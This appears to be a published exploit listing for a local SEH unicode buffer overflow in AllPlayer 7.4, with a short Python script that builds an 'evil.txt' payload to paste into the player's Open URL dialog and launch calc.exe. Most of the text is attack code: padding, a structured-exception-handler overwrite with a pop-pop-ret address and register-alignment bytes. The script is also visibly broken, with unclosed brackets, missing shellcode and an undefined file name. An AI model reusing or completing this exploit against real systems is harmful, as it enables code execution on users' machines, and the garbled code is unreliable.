AllPlayer 7.4 SEH Buffer Overflow

AllPlayer version 7.4 SEH unicode buffer overflow exploit.

MD5 | dee707d7b200cc4d715c0246503d4041

#!/usr/bin/python -w

# Exploit Author: Chris Au
# Exploit Title: AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Date: 07-04-2019
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage:
# Version: 7.4
# Software Link:
# Tested Windows Windows 7 SP1 x86
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe

header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
#nop to shell
nop = "\xcc" * 115
shellcode = (
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')

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